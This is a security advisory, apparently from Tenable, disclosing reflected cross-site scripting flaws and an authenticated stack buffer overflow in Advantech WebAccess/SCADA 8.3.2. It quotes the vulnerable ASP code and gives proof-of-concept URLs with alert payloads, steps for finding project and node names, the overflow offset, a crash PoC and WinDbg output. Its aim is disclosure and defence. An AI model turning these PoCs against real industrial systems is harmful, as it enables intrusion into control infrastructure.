Synopsis
Tenable has discovered multiple vulnerabilities in Advantech WebAccess/SCADA 8.3.2.
CVE-2018-15703: Multiple Reflected Cross-Site Scripting
The broadweb/loadurl.asp page processes several HTTP GET parameters when rendering HTML output. The following parameter values are incorporated into the response without sanitization:
- title
- url
- lc
- rc
- tc
- bc
All of these parameters can be abused to inject malicious JavaScript and HTML into the page. Furthermore, the url parameter is used as the source of an iframe in the generated page. Below are code snippets showing the vulnerable code.
title_desc = <%="'" + Request.QueryString("title") + "'"%>; page_url = <%="'" + Request.QueryString("url") + "'"%>; left_c = <%="'" + Request.QueryString("lc") + "'"%>; right_c = <%="'" + Request.QueryString("rc") + "'"%>; top_c = <%="'" + Request.QueryString("tc") + "'"%>; bottom_c = <%="'" + Request.QueryString("bc") + "'"%>; … snip … document.write("<IFRAME NAME=page FRAMEBORDER=no WIDTH=100% HEIGHT=100% SRC='" + page_url + "' STYLE=position:relative;display:block>");
The following are proof of concepts:
http://192.168.1.192/broadweb/loadurl.asp?title=%27;alert(%22xss%22);// http://192.168.1.192/broadweb/loadurl.asp?url=%27;alert(%22xss%22);// http://192.168.1.192/broadweb/loadurl.asp?lc=%27;alert(%22xss%22);// http://192.168.1.192/broadweb/loadurl.asp?rc=%27;alert(%22xss%22);// http://192.168.1.192/broadweb/loadurl.asp?tc=%27;alert(%22xss%22);// http://192.168.1.192/broadweb/loadurl.asp?bc=%27;alert(%22xss%22);// http://192.168.1.192/broadweb/loadurl.asp?url=http://tenable.com
CVE-2018-15704: Authenticated Stack Buffer Overflow
A stack buffer overflow vulnerability exists in BwOpcBs.exe. An authenticated remote attacker can reach the vulnerability via /broadweb/system/opcImg.asp . This is due to a lack of input validation during the processing of the sv parameter. This parameter value is used to dynamically construct a command line, which is then passed to the RemoteWinExec function defined within webdobj.webdraw. Finally, BwOpcBs.exe is launched with the value of sv as its second command line argument.
The command line looks like such, where <sv> is the value of the sv parameter:
Bwopcbs.exe 1 <sv>
The BwOpcBs.exe executable does not properly validate its command line arguments, and a stack buffer can be overflowed by specifying a large value in sv. Specifically, a buffer consisting of 492 bytes will overwrite the instruction pointer.
In order for an attacker to successfully exploit this vulnerability, the following parameters must be specified when requesting opcImc.asp:
- proj
- node
- opt
Values for proj and node must be known prior to launching an attack. These can be discovered by performing the following steps:
- Visit /WADashboard/login?cont=dashboardViewer in a web browser.
- Project names will be listed in the drop-down menu.
- Choose a project name.
- Visit /broadweb/<project name>.dpj. Replace <project name> with the project you selected.
- Notice that there are node names listed. Choose a node name.
The value of 'opt' must be 1.
Using this information, a remote attacker may craft a malicious URL to be sent to a WebAccess administrator. Once this URL is visited the exploit would be launched. Below is a code snippet in opcImc.asp showing the vulnerable code.
if opt = 1 then if instr(UCase(opcServer), "RW.FASERVER" ) > 0 then cmdLine = "Bwopcbs.exe 1 " + Request.QueryString("sv") else cmdLine = "Bwopcbs.exe 1 " + Request.QueryString("sv") end if end if select case opt case 1 tObj.RemoteWinExec proj, node, cmdLine tObj.BwSleep(100) tObj.RemoteFileTransfer proj, node, ".", ".", "Bwopcbs.ini", 0
The following is output from WinDbg, showing an access violation. Notice that EIP is overwritten with 0x41414141 ("AAAA").
Microsoft (R) Windows Debugger Version 6.12.0002.633 AMD64 Copyright (c) Microsoft Corporation. All rights reserved. CommandLine: C:\WebAccess\Node\BwOpcBs.exe 1 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA Symbol search path is: *** Invalid *** **************************************************************************** * Symbol loading may be unreliable without a symbol search path. * * Use .symfix to have the debugger choose a symbol path. * * After setting your symbol path, use .reload to refresh symbol locations. * **************************************************************************** Executable search path is: ModLoad: 00000000`00400000 00000000`00411000 image00000000`00400000 ModLoad: 00000000`77ab0000 00000000`77c59000 ntdll.dll ModLoad: 00000000`77c90000 00000000`77e10000 ntdll32.dll ModLoad: 00000000`74900000 00000000`7493f000 C:\Windows\SYSTEM32\wow64.dll ModLoad: 00000000`748a0000 00000000`748fc000 C:\Windows\SYSTEM32\wow64win.dll ModLoad: 00000000`74890000 00000000`74898000 C:\Windows\SYSTEM32\wow64cpu.dll (3324.21e4): Break instruction exception - code 80000003 (first chance) *** ERROR: Symbol file could not be found. Defaulted to export symbols for ntdll.dll - ntdll!CsrSetPriorityClass+0x40: 00000000`77b5cb70 cc int 3 0:000> !load winext/msec 0:000> g ModLoad: 00000000`77990000 00000000`77aaf000 WOW64_IMAGE_SECTION ModLoad: 00000000`75da0000 00000000`75eb0000 WOW64_IMAGE_SECTION ModLoad: 00000000`77990000 00000000`77aaf000 NOT_AN_IMAGE ModLoad: 00000000`77890000 00000000`7798a000 NOT_AN_IMAGE ModLoad: 00000000`75da0000 00000000`75eb0000 C:\Windows\syswow64\kernel32.dll ModLoad: 00000000`75fa0000 00000000`75fe7000 C:\Windows\syswow64\KERNELBASE.dll ModLoad: 00000000`75f00000 00000000`75fa0000 C:\Windows\syswow64\ADVAPI32.dll ModLoad: 00000000`75990000 00000000`75a3c000 C:\Windows\syswow64\msvcrt.dll ModLoad: 00000000`75850000 00000000`75869000 C:\Windows\SysWOW64\sechost.dll ModLoad: 00000000`75870000 00000000`75960000 C:\Windows\syswow64\RPCRT4.dll ModLoad: 00000000`757f0000 00000000`75850000 C:\Windows\syswow64\SspiCli.dll ModLoad: 00000000`757e0000 00000000`757ec000 C:\Windows\syswow64\CRYPTBASE.dll ModLoad: 00000000`75ff0000 00000000`7614c000 C:\Windows\syswow64\ole32.dll ModLoad: 00000000`77460000 00000000`774f0000 C:\Windows\syswow64\GDI32.dll ModLoad: 00000000`76450000 00000000`76550000 C:\Windows\syswow64\USER32.dll ModLoad: 00000000`76320000 00000000`7632a000 C:\Windows\syswow64\LPK.dll ModLoad: 00000000`774f0000 00000000`7758d000 C:\Windows\syswow64\USP10.dll ModLoad: 00000000`75cc0000 00000000`75d4f000 C:\Windows\syswow64\OLEAUT32.dll (3324.21e4): WOW64 breakpoint - code 4000001f (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. *** ERROR: Symbol file could not be found. Defaulted to export symbols for ntdll32.dll - ntdll32!LdrVerifyImageMatchesChecksum+0x96c: 77d3103b cc int 3 0:000:x86> g ModLoad: 75a40000 75aa0000 C:\Windows\SysWOW64\IMM32.DLL ModLoad: 75aa0000 75b6c000 C:\Windows\syswow64\MSCTF.dll ModLoad: 00000000`76290000 00000000`76313000 C:\Windows\syswow64\CLBCatQ.DLL (3324.21e4): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. 41414141 ?? ??? 0:000:x86> r eax=00000000 ebx=7efde000 ecx=0040c390 edx=0018f318 esi=0040f125 edi=0018fc6d eip=41414141 esp=0018fa14 ebp=0018ff88 iopl=0 nv up ei pl nz ac po nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010212 41414141 ?? ???
Below is a proof of concept. In order to test it out, ensure you are logged in and replace the following items to contain valid values:
- IP/hostname
- proj
- node
http://192.168.1.192/broadweb/system/opcImg.asp?proj=myproject&node=mynode&sv=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&opt=1
Solution
Disclosure Timeline
All information within TRA advisories is provided “as is”, without warranty of any kind, including the implied warranties of merchantability and fitness for a particular purpose, and with no guarantee of completeness, accuracy, or timeliness. Individuals and organizations are responsible for assessing the impact of any actual or potential security vulnerability.
Tenable takes product security very seriously. If you believe you have found a vulnerability in one of our products, we ask that you please work with us to quickly resolve it in order to protect customers. Tenable believes in responding quickly to such reports, maintaining communication with researchers, and providing a solution in short order.
For more details on submitting vulnerability information, please see our Vulnerability Reporting Guidelines page.
If you have questions or corrections about this advisory, please email [email protected]